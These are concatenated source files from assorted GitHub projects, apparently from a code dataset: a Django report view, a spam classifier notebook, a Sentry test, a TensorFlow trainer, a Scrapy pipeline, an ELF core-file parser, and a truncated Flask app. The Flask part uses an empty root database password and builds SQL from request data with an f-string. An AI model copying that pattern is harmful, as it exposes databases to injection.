session=session)\n context = {\n \"reports\": reports,\n \"session\": session,\n \"class\": klass,\n \"attitudes\": Attitude.objects.all().order_by(\"text\"),\n \"interests\": Interest.objects.all().order_by(\"text\"),\n \"conducts\": Conduct.objects.all().order_by(\"text\"),\n \"remarks\": Remark.objects.all().order_by(\"text\"),\n }\n return render(request, self.template_name, context)\n\n @method_decorator(login_required(login_url=\"accounts:login\"))\n def post(self, request):\n total_attendance = request.POST.get(\"total_attendance\")\n report_ids = request.POST.getlist(\"report_ids\")\n attendance_list = request.POST.getlist(\"attendance\")\n attitudes = request.POST.getlist(\"attitudes\")\n interests = request.POST.getlist(\"interests\")\n conducts = request.POST.getlist(\"conducts\")\n remarks = request.POST.getlist(\"remarks\")\n classes = request.POST.getlist(\"classes\")\n promotions = request.POST.getlist(\"promotions\")\n\n # Validating user input\n if not (str(total_attendance).isdigit()):\n messages.error(request, \"Invalid total attendance.\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n\n if len(attendance_list) != len(attitudes) != len(conducts) != len(\n report_ids) != len(classes) != len(promotions) != len(\n remarks) != len(interests):\n messages.warning(\n request,\n \"Invalid record. Please do not leave any records half filled.\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n\n # Check class teacher permissions\n has_class_teacher_permission = True\n class_ids = set(classes)\n teacher_klasses = Klass.objects.filter(\n id__in=class_ids, class_teacher__user=request.user)\n if len(teacher_klasses) != len(class_ids):\n has_class_teacher_permission = False\n\n # Updating records\n for report_id, class_id, attendance, attitude, conduct, interest, remark, promotion in zip(\n report_ids, classes, attendance_list, attitudes, conducts,\n interests, remarks, promotions):\n\n report = get_object_or_404(SessionReport, id=report_id)\n klass = get_object_or_404(Klass, id=class_id)\n\n # Check whether user has the permission to modify this record.\n if not (request.user.has_perm(\"setup.manage_other_report\")\n or has_class_teacher_permission\n ): # Administrative permission.\n messages.error(\n request,\n \"You do not have permission to view or modify this subject record.\"\n )\n return redirect(request.META.get(\"HTTP_REFERER\"))\n\n # Updating record\n report.total_attendance = total_attendance\n report.attendance = attendance\n report.klass = klass\n report.attitude_id = attitude\n report.conduct_id = conduct\n report.interest_id = interest\n report.promotion = promotion\n report.class_teacher_remark_id = remark\n report.save()\n\n messages.success(request, \"Record successfully updated.\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n","repo_name":"dodziraynard/curie","sub_path":"app/dashboard/views/class_teacher_report.py","file_name":"class_teacher_report.py","file_ext":"py","file_size_in_byte":6138,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"72265617848","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sn\nimport matplotlib.pyplot as plt\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import roc_auc_score, f1_score, confusion_matrix\nfrom sklearn.naive_bayes import MultinomialNB\nfrom wordcloud import WordCloud\n\n\n# In[2]:\n\n\n# https://www.kaggle.com/uciml/sms-spam-collection-dataset\nget_ipython().system('wget https://lazyprogrammer.me/course_files/spam.csv')\n\n\n# In[3]:\n\n\ndf = pd.read_csv(\"spam.csv\", encoding='ISO-8859-1')\n#find contains some invalid chars\n#depending on which version of pandas you have you may face an error\n#so the encoding is not neccessary but the thing is being safe rather than sorry -Kiavash qoutes\n\n\n# In[4]:\n\n\ndf.head()\n\n\n# In[5]:\n\n\ndf = df.drop([\"Unnamed: 2\", \"Unnamed: 3\", \"Unnamed: 4\"], axis = 1)\n\n\n# In[6]:\n\n\ndf.head()\n\n\n# In[7]:\n\n\ndf.columns = ['labels', 'data']\n\n\n# In[8]:\n\n\ndf.head()\n\n\n# In[9]:\n\n\ndf['labels'].hist()\n\n\n# In[10]:\n\n\ndf['b_labels'] = df['labels'].map({'ham':0, 'spam':1})\nY = df['b_labels'].to_numpy()\nY\n\n\n# In[11]:\n\n\ndf_train, df_test, Ytrain, Ytest = train_test_split(df['data'], Y, test_size = 0.33)\n\n\n# In[12]:\n\n\n#brute forcing through the errors, why database bad? :'(\nfeaturizer = TfidfVectorizer(decode_error='ignore')\nXtrain = featurizer.fit_transform(df_train)\nXtest = featurizer.transform(df_test)\n\n\n# In[13]:\n\n\nXtrain\n\n\n# In[14]:\n\n\nmodel = MultinomialNB()\nmodel.fit(Xtrain, Ytrain)\nprint(\"train acc: \",model.score(Xtrain, Ytrain))\nprint(\"test acc: \",model.score(Xtest,Ytest))\n\n\n# In[15]:\n\n\nPtrain = model.predict(Xtrain)\nPtest = model.predict(Xtest)\nprint(\"train F1: \", f1_score(Ytrain, Ptrain))\nprint(\"test F1: \", f1_score(Ytest, Ptest))\n\n\n# In[16]:\n\n\nProb_train = model.predict_proba(Xtrain)[:,1]\nProb_test = model.predict_proba(Xtest)[:,1]\nprint(\"train AUC:\", roc_auc_score(Ytrain, Prob_train))\nprint(\"test AUC:\", roc_auc_score(Ytest, Prob_test))\n\n\n# In[17]:\n\n\ncm = confusion_matrix(Ytrain, Ptrain)\ncm\n\n\n# In[18]:\n\n\n#This is for representation only - ignore if you don't understand (no big deal)\ndef plot_cm(cm):\n classes = ['ham', 'spam']\n df_cm = pd.DataFrame(cm, index = classes, columns = classes)\n ax = sn.heatmap(df_cm, annot = True, fmt = 'g')\n ax.set_xlabel(\"Predicted\")\n ax.set_ylabel(\"Target\")\nplot_cm(cm)\n\n\n# In[19]:\n\n\ncm_test = confusion_matrix(Ytest, Ptest)\nplot_cm(cm_test)\n\n\n# In[20]:\n\n\ndef visualize(label):\n words = ''\n for msg in df[df['labels'] == label]['data']:\n #see what i did? :))\n msg = msg.lower()\n words += msg + ' '\n wordcloud = WordCloud(width=600, height=400).generate(words)\n plt.imshow(wordcloud)\n plt.axis('off')\n plt.show()\n\n\n# In[21]:\n\n\nvisualize('spam')\n\n\n# In[22]:\n\n\nvisualize('ham')\n\n","repo_name":"itsjustkia/spam-detector","sub_path":"Spam-Detection (1).py","file_name":"Spam-Detection (1).py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33523373761","text":"'''\n打包参考资料:https://www.cnblogs.com/dcb3688/p/4211390.html\n'''\nimport os\n\napp_path = os.path.abspath(os.path.join(os.path.abspath(__file__), \"..\"))\nprint(\"Package App Path==>\", app_path)\n#order = \"pyinstaller.exe -F -w {}/app.py --upx-dir={}\".format(app_path, os.path.join(app_path, \"upx308w\"))\norder = \"pyinstaller.exe -F -w {}/app.py \".format(app_path)\nprint(\"Package Order==>\", order)\nos.system(order)","repo_name":"PatchLion/PyQt5ProjectTemplate","sub_path":"package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"73989825526","text":"from unittest import mock\n\nimport responses\n\nfrom sentry.notifications.notifications.integration_nudge import (\n MESSAGE_LIBRARY,\n IntegrationNudgeNotification,\n)\nfrom sentry.testutils.cases import SlackActivityNotificationTest\nfrom sentry.testutils.helpers.slack import get_attachment_no_text, send_notification\nfrom sentry.types.integrations import ExternalProviders\n\nSEED = 0\n\n\nclass SlackNudgeNotificationTest(SlackActivityNotificationTest):\n @responses.activate\n @mock.patch(\"sentry.notifications.notify.notify\", side_effect=send_notification)\n def test_nudge(self, mock_func):\n notification = IntegrationNudgeNotification(\n self.organization,\n recipient=self.user,\n provider=ExternalProviders.SLACK,\n seed=SEED,\n )\n\n with self.tasks():\n notification.send()\n\n attachment = get_attachment_no_text()\n assert attachment[\"text\"] == MESSAGE_LIBRARY[SEED].format(provider=\"Slack\")\n assert len(attachment[\"actions\"]) == 1\n assert attachment[\"actions\"][0][\"action_id\"] == \"enable_notifications\"\n assert attachment[\"actions\"][0][\"name\"] == \"Turn on personal notifications\"\n assert attachment[\"actions\"][0][\"value\"] == \"all_slack\"\n","repo_name":"gms-ws-sandbox/sentry","sub_path":"tests/sentry/integrations/slack/notifications/test_nudge.py","file_name":"test_nudge.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"15108346679","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: kebo\n@contact: kebo0912@outlook.com\n\n@version: 1.0\n@file: model.py\n@time: 2020/4/26 0:05\n\n这一行开始写关于本文件的说明与解释\n\n\n\"\"\"\nimport json\nimport tensorflow as tf\n\nfrom dataset_reader import MAX_LEN, MAX_WORDS, ds_train, ds_test\n\n\nclass CnnModel(tf.keras.models.Model):\n def __init__(self):\n super(CnnModel, self).__init__()\n\n def build(self, input_shape):\n self.embedding = tf.keras.layers.Embedding(MAX_WORDS, 7, input_length=MAX_LEN)\n self.conv_1 = tf.keras.layers.Conv1D(16, kernel_size=5, name=\"conv_1\", activation=\"relu\")\n self.pool = tf.keras.layers.MaxPool1D()\n self.conv_2 = tf.keras.layers.Conv1D(128, kernel_size=2, name=\"conv_2\", activation=\"relu\")\n self.flatten = tf.keras.layers.Flatten()\n self.dense = tf.keras.layers.Dense(1, activation=\"sigmoid\")\n super(CnnModel, self).build(input_shape)\n\n def call(self, x):\n x = self.embedding(x)\n x = self.conv_1(x)\n x = self.pool(x)\n x = self.conv_2(x)\n x = self.pool(x)\n x = self.flatten(x)\n x = self.dense(x)\n return x\n\n\nclass Trainer:\n def __init__(self):\n self.model = CnnModel()\n self.model.build(input_shape=(None, MAX_LEN))\n self.model.summary()\n\n self.optimizer = tf.keras.optimizers.Nadam()\n self.loss_func = tf.keras.losses.BinaryCrossentropy()\n\n self.train_loss = tf.keras.metrics.Mean(name='train_loss')\n self.train_metric = tf.keras.metrics.BinaryAccuracy(name='train_accuracy')\n\n self.valid_loss = tf.keras.metrics.Mean(name='valid_loss')\n self.valid_metric = tf.keras.metrics.BinaryAccuracy(name='valid_accuracy')\n\n # 打印时间分割线\n @classmethod\n @tf.function\n def print_bar(cls):\n today_ts = tf.timestamp() % (24 * 60 * 60)\n\n hour = tf.cast(today_ts // 3600 + 8, tf.int32) % tf.constant(24)\n mini_te = tf.cast((today_ts % 3600) // 60, tf.int32)\n second = tf.cast(tf.floor(today_ts % 60), tf.int32)\n\n def time_format(m):\n if tf.strings.length(tf.strings.format(\"{}\", m)) == 1:\n return tf.strings.format(\"0{}\", m)\n else:\n return tf.strings.format(\"{}\", m)\n\n time_string = tf.strings.join([time_format(hour), time_format(mini_te),\n time_format(second)], separator=\":\")\n tf.print(\"==========\" * 8 + time_string)\n\n @tf.function\n def train_step(self, features, labels):\n with tf.GradientTape() as tape:\n predictions = self.model(features, training=True)\n loss = self.loss_func(labels, predictions)\n gradients = tape.gradient(loss, self.model.trainable_variables)\n self.optimizer.apply_gradients(zip(gradients, self.model.trainable_variables))\n\n self.train_loss.update_state(loss)\n self.train_metric.update_state(labels, predictions)\n\n @tf.function\n def valid_step(self, features, labels):\n predictions = self.model(features, training=False)\n batch_loss = self.loss_func(labels, predictions)\n self.valid_loss.update_state(batch_loss)\n self.valid_metric.update_state(labels, predictions)\n\n def train_model(self, epochs, train_data, valid_data):\n for epoch in tf.range(1, epochs + 1):\n\n for features, labels in train_data:\n self.train_step(features, labels)\n\n for features, labels in valid_data:\n self.valid_step(features, labels)\n\n # 此处logs模板需要根据metric具体情况修改\n logs = 'Epoch={},Loss:{},Accuracy:{},Valid Loss:{},Valid Accuracy:{}'\n\n if epoch % 1 == 0:\n self.print_bar()\n tf.print(tf.strings.format(logs,\n (epoch, self.train_loss.result(), self.train_metric.result(),\n self.valid_loss.result(),\n self.valid_metric.result())))\n tf.print(\"\")\n\n self.train_loss.reset_states()\n self.valid_loss.reset_states()\n self.train_metric.reset_states()\n self.valid_metric.reset_states()\n # self.model.save_weights('./data/output/keras_model_weight.h5')\n # model_json = self.model.to_json()\n # json.dump(model_json, open(\"./data/output/model_json.json\", \"w\"), indent=4)\n self.model.save('./data/output', save_format=\"tf\")\n\n print('export saved model.')\n\n\nif __name__ == '__main__':\n trainer = Trainer()\n trainer.train_model(epochs=5, train_data=ds_train, valid_data=ds_test)\n","repo_name":"bo-ke/algorithm_support","sub_path":"frameworks/tensorflow/modeling_process/example_text_data_modeling/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18305451958","text":"#######################################################################\n# imports #\n#######################################################################\n\nfrom sqlalchemy.orm import sessionmaker\n\nfrom models import Courses, db_connect, create_course_table\n\n#######################################################################\n# classes #\n#######################################################################\n\nclass TonScraperPipeline(object):\n def __init__(self):\n engine = db_connect()\n create_course_table(engine)\n self.Session = sessionmaker(bind=engine)\n\n def process_item(self, item, spider):\n session = self.Session()\n course = Courses(**item)\n\n try:\n session.add(course)\n session.commit()\n except:\n session.rollback()\n raise\n finally:\n session.close()\n\n return item\n","repo_name":"textbookornot/scrapers","sub_path":"ton_scraper/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16130215810","text":"\nfrom __future__ import print_function\n\nimport os\nfrom mmap import mmap, ACCESS_READ, ACCESS_WRITE, PAGESIZE\nimport struct\n\nimport andb.py23 as py23\n\nclass Enum:\n \n @classmethod\n def Name(cls, num):\n for i in dir(cls):\n v = getattr(cls, i)\n if isinstance(v, int):\n if v == num:\n return i\n return \"unknown(0x%x)\" % num\n\ndef ReadCStr(sec):\n \"\"\" read section offset as c-style string \"\"\"\n sz = []\n while True:\n c = sec.Read(1)\n c = c.decode('utf-8')\n #c = str(c, 'utf-8')\n if c == chr(0):\n return \"\".join(sz) \n sz.append(c)\n\ndef roundup(x, up):\n y = (x - 1) // 4 + 1\n return y*up \n\n\nclass Elf:\n \n # file opened\n _I_file = None\n \n # mmap fd \n _I_mmap = None\n \n # instance base offset from mmap front\n _I_offset = None \n\n # last saved offset\n _saved_offset = 0\n\n # elf header\n _ehdr = None\n\n # program headers\n _phdrs = None\n\n # section headers\n _shdrs = None\n\n # string table\n _strtab = None\n\n # notes\n _notes = None\n\n class SHTYPE(Enum):\n \"\"\"Section Header Type\n \"\"\"\n NULL_TYPE = 0\n PROGBITS = 1\n SYMTAB = 2\n STRTAB = 3\n RELA = 4\n HASH = 5\n DYNAMIC = 6\n NOTE = 7\n NOBITS = 8\n REL = 9\n SHLIB = 10\n DYNSYM = 11\n INIT_ARRAY = 14\n FINI_ARRAY = 15\n PREINIT_ARRAY = 16\n GROUP = 17\n SYMTAB_SHNDX = 18\n\n class PHTYPE(Enum):\n \"\"\"Program Header Type\n \"\"\"\n NOTE = 0x00000004\n\n class NTYPE(Enum):\n \"\"\"Note Header Type\n \"\"\"\n NT_GNU_BUILD_ID = 3\n NT_PRSTATUS = 1\n NT_PRFPREG = 2\n NT_PRPSINFO = 3\n NT_TASKSTRUCT = 4\n NT_AUXV = 6\n NT_SIGINFO = 0x53494749\n NT_FILE = 0x46494c45\n \n class EMTYPE(Enum):\n EM_X86_64 = 62\n EM_AARCH64 = 183\n\n class Section:\n \"\"\" represents a Section in Elf file. \"\"\"\n\n def __init__(self, elf, name, offset, size):\n self._elf = elf\n self._name = name\n self._offset = offset\n self._size = size\n\n def Seek(self, offset):\n off = self._offset + offset\n self._elf._I_mmap.seek(off)\n\n def Tell(self):\n off = self._elf._I_mmap.tell()\n return off - self._offset\n\n def Read(self, size):\n return self._elf._I_mmap.read(size) \n\n def ReadU8(self):\n return struct.unpack('B', self.Read(1))[0] \n \n def ReadU16(self):\n return struct.unpack('H', self.Read(2))[0] \n \n def ReadU32(self):\n return struct.unpack('I', self.Read(4))[0] \n \n def ReadU64(self):\n return struct.unpack('Q', self.Read(8))[0] \n \n def ReadI8(self):\n return struct.unpack('b', self.Read(1))[0] \n \n def ReadI16(self):\n return struct.unpack('h', self.Read(2))[0] \n \n def ReadI32(self):\n return struct.unpack('i', self.Read(4))[0] \n \n def ReadI64(self):\n return struct.unpack('q', self.Read(8))[0] \n \n def ReadUleb128(self):\n \"\"\" Extract a ULEB128 value \"\"\"\n byte = self.ReadU8()\n if byte & 0x80:\n result = byte & 0x7f\n shift = 7\n while byte & 0x80:\n byte = self.ReadU8()\n result |= (byte & 0x7f) << shift\n shift += 7\n return result\n else:\n return byte\n\n def ReadSleb128(self):\n \"\"\" Extract a SLEB128 value \"\"\"\n result = 0\n shift = 0\n size = 64\n byte = 0\n bytecount = 0\n while 1:\n bytecount += 1\n byte = self.ReadU8()\n result |= (byte & 0x7f) << shift\n shift += 7\n if (byte & 0x80) == 0:\n break\n # Sign bit of byte is 2nd high order bit (0x40)\n if (shift < size and (byte & 0x40)):\n result |= - (1 << shift)\n return result\n\n class StrTab(Section):\n \"\"\" strtab is a special secion holds all elf strings \"\"\" \n\n def Str(self, index):\n self.Seek(index)\n return ReadCStr(self) \n\n \"\"\"Begin Elf methods.\n \"\"\"\n def Seek(self, offset):\n \"\"\"Seek in relative offset with retore.\n \"\"\"\n m = self._I_mmap\n self._saved_offset = m.tell()\n x = self._I_offset + offset\n m.seek(x)\n return m\n\n def Restore(self):\n \"\"\"Retore last seek.\n \"\"\"\n m = self._I_mmap\n m.seek(self._saved_offset)\n return m\n\n def GetEhdr(self):\n \"\"\"parse elf header \n \"\"\"\n if self._ehdr:\n return self._ehdr\n\n sd = '2HI3QI6H'\n size = struct.calcsize(sd)\n\n m = self.Seek(16) \n t = struct.unpack(sd, m.read(size))\n elfhdr = {}\n elfhdr['e_type']= t[0]\n elfhdr['e_machine'] = t[1]\n elfhdr['e_version'] = t[2]\n elfhdr['e_entry'] = t[3]\n elfhdr['e_phoff'] = t[4]\n elfhdr['e_shoff'] = t[5]\n elfhdr['e_flags'] = t[6]\n elfhdr['e_ehsize'] = t[7]\n elfhdr['e_phentsize'] = t[8]\n elfhdr['e_phnum'] = t[9]\n elfhdr['e_shentsize'] = t[10]\n elfhdr['e_shnum'] = t[11]\n elfhdr['e_shstrndx'] = t[12]\n self.Restore() \n \n self._ehdr = elfhdr\n return elfhdr \n\n def GetShdrs(self):\n \"\"\"parse all sections header \n \"\"\"\n if self._shdrs:\n return self._shdrs\n\n elfhdr = self.GetEhdr()\n off = elfhdr['e_shoff'] \n num = elfhdr['e_shnum']\n size = elfhdr['e_shentsize']\n \n sechdrs = []\n m = self.Seek(off)\n for i in range(num):\n t = struct.unpack('2I4Q2I2Q', m.read(size))\n sec = {}\n sec['sh_name'] = t[0]\n sec['sh_type'] = t[1]\n sec['sh_flags'] = t[2]\n sec['sh_addr'] = t[3]\n sec['sh_offset'] = t[4]\n sec['sh_size'] = t[5]\n sec['sh_link'] = t[6]\n sec['sh_info'] = t[7]\n sec['sh_addralign'] = t[8]\n sec['sh_entsize'] = t[9]\n sechdrs.append(sec)\n self.Restore()\n\n self._shdrs = sechdrs\n return sechdrs \n\n def GetPhdrs(self):\n \"\"\" parse all program header \"\"\"\n\n if self._phdrs:\n return self._phdrs\n\n elfhdr = self.GetEhdr()\n off = elfhdr['e_phoff']\n num = elfhdr['e_phnum']\n size = elfhdr['e_phentsize']\n \n proghdrs = []\n m = self.Seek(off)\n for i in range(num):\n # uint32_t p_type;\n # uint32_t p_flags;\n # Elf64_Off p_offset;\n # Elf64_Addr p_vaddr;\n # Elf64_Addr p_paddr;\n # uint64_t p_filesz;\n # uint64_t p_memsz;\n # uint64_t p_align;\n t = struct.unpack('2I6Q', m.read(size))\n hdr = {}\n hdr['p_type'] = t[0]\n hdr['p_flags'] = t[1]\n hdr['p_offset'] = t[2]\n hdr['p_vaddr'] = t[3]\n hdr['p_paddr'] = t[4]\n hdr['p_filesz'] = t[5]\n hdr['p_memsz'] = t[6]\n hdr['p_align'] = t[7]\n proghdrs.append(hdr)\n self.Restore()\n\n self._phdrs = proghdrs \n return hdr \n\n def SecEntry(self):\n \"\"\" for elf shares one mmap entry,\n SecEntry() is used for section switch.\n save current Section.Tell() and restore after Section finish.\n\n e.g.\n save = SecEntry()\n sec.Seek(xxx)\n SecExit(save)\n \"\"\"\n return self._I_mmap.tell()\n\n def SecExit(self, save):\n self._I_mmap.seek(save)\n\n def GetSection(self, name):\n \"\"\"get Section by name\n \"\"\"\n for s in self._I_shdrs:\n sh_name = self._I_strtab.Str(s['sh_name'])\n if sh_name == name:\n return Elf.Section(self, sh_name, s['sh_offset'], s['sh_size'])\n return None\n\n # TODO: refreform to a independent class to represent it\n def GetNotes(self):\n if self._notes:\n return self._notes\n\n phNoteHdr = None\n for p in self.GetPhdrs():\n if p['p_type'] == Elf.PHTYPE.NOTE:\n phNoteHdr = p\n if phNoteHdr is None:\n return None\n\n m = self.Seek(phNoteHdr['p_offset'])\n size = phNoteHdr['p_memsz']\n if size == 0:\n size = phNoteHdr['p_filesz']\n noteContent = m.read(size);\n\n notes = []\n offset = 0\n while offset < len(noteContent):\n t = struct.unpack('3I', noteContent[offset:offset + 12])\n n_namesz = t[0]\n n_descsz = t[1]\n n_type = t[2]\n offset = offset + 12\n name = noteContent[offset:offset + n_namesz]\n offset = offset + roundup(n_namesz, 4)\n desc = noteContent[offset:offset + n_descsz]\n offset = offset + roundup(n_descsz, 4)\n notes.append((name, desc, n_type))\n self.Restore()\n\n self._notes = notes\n return notes\n\n @staticmethod\n def NtFiles(note):\n o = [] \n\n def cstr(note, offset):\n a = note[offset:]\n i = a.index('\\0')\n assert i > offset\n return a[:i]\n\n off = 0\n t = struct.unpack_from('2Q', note, off)\n size = t[0]\n #o['page_size'] = t[1]\n\n off = 16\n\n for i in range(size):\n assert off < len(note)\n t = struct.unpack_from('3Q', note, off)\n \n f = {}\n f['start_addr'] = t[0]\n f['end_addr'] = t[1]\n f['offset'] = t[2]\n off = off + 24\n o.append(f)\n\n names = note[off:].decode('utf8').split('\\0')\n\n for i in range(size):\n t = names[i]\n o[i]['name'] = t\n\n return o\n\n @staticmethod\n def NtSigInfo(note):\n o = {}\n off = 0\n t = struct.unpack_from('2Ii', note, off)\n o['si_signo'] = t[0]\n o['si_code'] = t[1]\n o['si_errno'] = t[2]\n off = off + 16 \n\n import signal\n # SIGILL, SIGFPE, SIGSEGV, SIGBUS, SIGTRAP, SIGEMT\n if o['si_signo'] == signal.SIGILL or \\\n o['si_signo'] == signal.SIGFPE or \\\n o['si_signo'] == signal.SIGSEGV or \\\n o['si_signo'] == signal.SIGBUS or \\\n o['si_signo'] == signal.SIGTRAP:\n t = struct.unpack_from('Q', note, off)\n o['addr'] = t[0]\n else:\n t = struct.unpack_from('3I', note, off)\n o['sender_pid'] = t[0]\n o['sender_uid'] = t[1]\n o['status'] = t[2]\n \n return o\n\n @staticmethod\n def timeval(note, off):\n t = struct.unpack_from('2Q', note, off)\n return t\n\n @staticmethod\n def NtPrStatus(note):\n o = {}\n \n off = 0\n fmt = '3Ih2x2Q4I8Q'\n t = struct.unpack_from(fmt, note, off)\n off = off + struct.calcsize(fmt) \n \n o['si_signo'] = t[0]\n o['si_code'] = t[1]\n o['si_errno'] = t[2]\n o['pr_cursig'] = t[3]\n o['pr_sigpend'] = t[4]\n o['pr_sighold'] = t[5]\n o['pr_pid'] = t[6]\n o['pr_ppid'] = t[7]\n o['pr_pgrp'] = t[8]\n o['pr_sid'] = t[9]\n o['pr_utime'] = t[10] + t[11] / 1000000.0\n o['pr_stime'] = t[12] + t[13] / 1000000.0\n o['pr_cutime'] = t[14] + t[15] / 1000000.0 \n o['pr_cstime'] = t[16] + t[17] / 1000000.0\n return o\n \n @staticmethod\n def NtPrPsInfo(note):\n o = {}\n off = 0\n fmt = 'bc2bQ2I4i16s80s'\n t = struct.unpack_from(fmt, note, off)\n o['pr_state'] = t[0]\n o['pr_sname'] = t[1].decode('utf8')\n o['pr_zomb'] = t[2]\n o['pr_nice'] = t[3]\n o['pr_flag'] = t[4]\n o['pr_uid'] = t[5]\n o['pr_gid'] = t[6]\n o['pr_pid'] = t[7]\n o['pr_ppid'] = t[8]\n o['pr_pgrp'] = t[9]\n o['pr_sid'] = t[10]\n o['pr_fname'] = t[11].decode('utf8').split('\\0')[0]\n o['pr_psargs'] = t[12].decode('utf8').split('\\0')[0]\n return o\n \n @staticmethod\n def NtGnuBuildId(note):\n return \"\".join(\"{:02x}\".format(py23.byte2int(c)) for c in note)\n\n def GetNtFiles(self):\n for (name, desc, n_type) in self.GetNotes():\n if n_type == Elf.NTYPE.NT_FILE:\n return self.NtFiles(desc)\n return None \n\n def GetNtSigInfo(self):\n for (name, desc, n_type) in self.GetNotes():\n if n_type == Elf.NTYPE.NT_SIGINFO:\n return self.NtSigInfo(desc)\n return None \n\n def GetNtPrStatus(self):\n for (name, desc, n_type) in self.GetNotes():\n if n_type == Elf.NTYPE.NT_PRSTATUS:\n return self.NtPrStatus(desc)\n return None \n\n def GetNtPrPsInfo(self):\n for (name, desc, n_type) in self.GetNotes():\n if n_type == Elf.NTYPE.NT_PRPSINFO:\n return self.NtPrPsInfo(desc)\n return None \n \n def GetBuildId(self):\n noteBuildId = None\n for (name, desc, n_type) in self.GetNotes():\n if name == b'GNU\\x00' and n_type == Elf.NTYPE.NT_GNU_BUILD_ID:\n return self.NtGnuBuildId(desc)\n return None\n\n def Load(self, filename):\n \"\"\" Load Elf file to memory\n \"\"\"\n\n # open file\n f = open(filename, 'rb')\n self._I_file = f\n self._I_offset = 0 \n\n # get file size\n f.seek(0, 2)\n size = f.tell()\n f.seek(0)\n\n # mmap\n m = mmap(f.fileno(), size, access = ACCESS_READ)\n self._I_mmap = m\n\n m.seek(0)\n magic = m.read(16)\n \n # compact py2 and py3\n if isinstance(magic, str):\n magic = [ord(i) for i in magic]\n\n if magic[0] != 127 or \\\n magic[1] != ord('E') or \\\n magic[2] != ord('L') or \\\n magic[3] != ord('F'):\n print (\"error: not a valid elf file.\")\n return\n\n # read elf header\n elfhdr = self.GetEhdr()\n\n # read section headers\n sechdrs = self.GetShdrs()\n \n # get strtab, strtab maybe not when elf is corefile \n for s in sechdrs:\n if s['sh_type'] == Elf.SHTYPE.STRTAB:\n self._strtab = Elf.StrTab(self, '.shstrtab', s['sh_offset'], s['sh_size'])\n break\n # if self._I_strtab is None:\n # raise Exception\n\n # read Program header\n proghdrs = self.GetPhdrs()\n\n def AttachV(self, vaddr):\n\n phdrs = self.GetPhdrs()\n for i in phdrs:\n if i['p_flags'] & 0x1 and \\\n vaddr >= i['p_vaddr'] and \\\n vaddr <= i['p_vaddr'] + i['p_memsz']:\n #print(\"0x%x %d %d\" % (i['p_vaddr'], i['p_filesz'], i['p_offset']))\n elf = Elf()\n elf.LoadOffset(self, i['p_offset'])\n return elf \n\n return None\n\n def LoadOffset(self, elf, offset=0):\n \"\"\"Attach an Elf in memory with offset as a new Elf.\n \"\"\"\n assert isinstance(elf, Elf)\n # as we didn't opened Elf file, _I_file is not saved.\n self._I_mmap = elf._I_mmap\n self._I_offset = offset\n \n #def LoadCorefileProgElf(self, filename, offset=0):\n m = self._I_mmap\n m.seek(offset)\n\n magic = m.read(16)\n \n # compact py2 and py3\n if isinstance(magic, str):\n magic = [ord(i) for i in magic]\n\n if magic[0] != 127 or \\\n magic[1] != ord('E') or \\\n magic[2] != ord('L') or \\\n magic[3] != ord('F'):\n print (\"error: not a valid elf file.\")\n return\n\n # read elf header\n elfhdr = self.GetEhdr()\n \n # read Program header\n proghdrs = self.GetPhdrs()\n \n def Unload(self):\n \"\"\"Unload Elf created by Load or Attach.\n \"\"\"\n if self._I_file:\n self._I_mmap.close()\n self._I_file.close()\n self._I_mmap = None\n self._I_file = None\n print('Elf Unloaded')\n\n @property\n def filename(self):\n if self._I_file:\n return self._I_file.name\n return None\n\n @property\n def filesize(self):\n f = self.filename\n if f:\n st = os.stat(f)\n return st.st_size\n return 0\n","repo_name":"noslate-project/andb","sub_path":"andb/loader/elf.py","file_name":"elf.py","file_ext":"py","file_size_in_byte":16784,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"76"} +{"seq_id":"74604226806","text":"from flask import Flask, render_template, request, jsonify\nimport json, datetime\n\nimport pymysql\n\nconn = pymysql.connect(\n host = \"localhost\", \n database=\"practice\",\n user= \"root\",\n password=\"\" \n)\ncursor = conn.cursor()\n\ncustomers = {}\norders = {}\norderitems = {}\ncustnorders = {\n \"customers\" : customers,\n \"orders\" : orders,\n \"ordersitems\" : orderitems\n}\n\n\ndef selectall():\n cursor.execute(\"select * from Customer\")\n data = cursor.fetchall()\n for i in data:\n customers.update({i[0] : i[1:]})\n cursor.execute(\"select orderid, quantity, OrderItemName, orderedOn, status, name from Customer, OrderItem, Orders where Customer.custid=Orders.custid and Orders.orderitemid = OrderItem.orderitemID order by orderid\")\n data = cursor.fetchall()\n for i in data:\n orders.update({i[0] : i[1:]})\n custnorders.update({\"ordersize\" : len(orders)})\n cursor.execute(' select count(*) from Orders where status=\"Pending\"')\n data = cursor.fetchall()[0][0]\n custnorders.update({\"pending\" : data})\n custnorders.update({\"nonpending\" : len(orders) - data })\n cursor.execute('select * from OrderItem')\n data = cursor.fetchall()\n for i in data:\n orderitems.update({i[0] : i[1:]})\n\n\n\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef home():\n selectall()\n # print(custnorders)\n return render_template(\"index.html\",data = custnorders)\n\n@app.route(\"/addcust\", methods =[\"GET\", \"POST\"])\ndef addcustomer():\n if request.method == \"POST\":\n data = json.loads(request.data)\n name = data['name']\n gender = \"F\" if(data['gender'] == \"Female\") else \"M\"\n phone = data['phone']\n address = data['address']\n action = data['action']\n if(action == 'add'):\n query = f'insert into Customer(name, gender, phone, address) 